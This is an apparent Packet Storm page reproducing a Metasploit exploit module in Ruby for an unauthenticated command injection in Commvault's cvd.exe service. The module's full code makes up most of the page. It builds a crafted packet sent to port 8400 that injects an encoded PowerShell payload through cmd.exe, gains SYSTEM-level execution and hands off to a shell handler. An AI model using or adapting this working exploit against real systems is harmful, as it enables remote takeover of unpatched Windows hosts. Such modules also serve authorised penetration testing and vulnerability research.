exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Commvault Communications Service (cvd) Command Injection

Commvault Communications Service (cvd) Command Injection
Posted Jan 9, 2018
Authored by b0yd | Site metasploit.com

This Metasploit module exploits a command injection vulnerability discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5 and v10). The vulnerability exists in the cvd.exe service and allows an attacker to execute arbitrary commands in the context of the service. By default, the Commvault Communications service installs and runs as SYSTEM in Windows and does not require authentication. This vulnerability was discovered in the Windows version. The Linux version wasn't tested.

tags | exploit, arbitrary
systems | linux, windows
SHA-256 | 17a8d88e94f4d922aee745206ec1f68bc231beaf46d176bb3e725cce023ab8d7

Commvault Communications Service (cvd) Command Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell

def initialize(info={})
super(update_info(info,
'Name' => 'Commvault Communications Service (cvd) Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability
discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
and v10). The vulnerability exists in the cvd.exe service and allows an
attacker to execute arbitrary commands in the context of the service. By
default, the Commvault Communications service installs and runs as SYSTEM in
Windows and does not require authentication. This vulnerability was discovered
in the Windows version. The Linux version wasn't tested.
},
'License' => MSF_LICENSE,
'Author' =>
[
'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
],
'References' =>
[
['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
{
'Arch' => [ARCH_X64, ARCH_X86]
}
],
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 12 2017'))

register_options([Opt::RPORT(8400)])

end

def exploit

buf = build_exploit
print_status("Connecting to Commvault Communications Service.")
connect
print_status("Executing payload")
#Send the payload
sock.put(buf)
#Handle the shell
handler
disconnect

end


def build_exploit

#Get encoded powershell of payload
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
#Remove additional cmd.exe call
psh = "powershell"
idx = command.index(psh)
command = command[(idx)..-1]

#Build packet
cmd_path = 'C:\Windows\System32\cmd.exe'
msg_type = 9
zero = 0
payload = ""
payload += make_nops(8)
payload += [msg_type].pack('I>')
payload += make_nops(328)
payload += cmd_path
payload += ";"
payload += ' /c "'
payload += command
payload += '" && echo '
payload += "\x00"
payload += [zero].pack('I>')

#Add length header and payload
ret_data = [payload.length].pack('I>')
ret_data += payload

ret_data

end
end
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close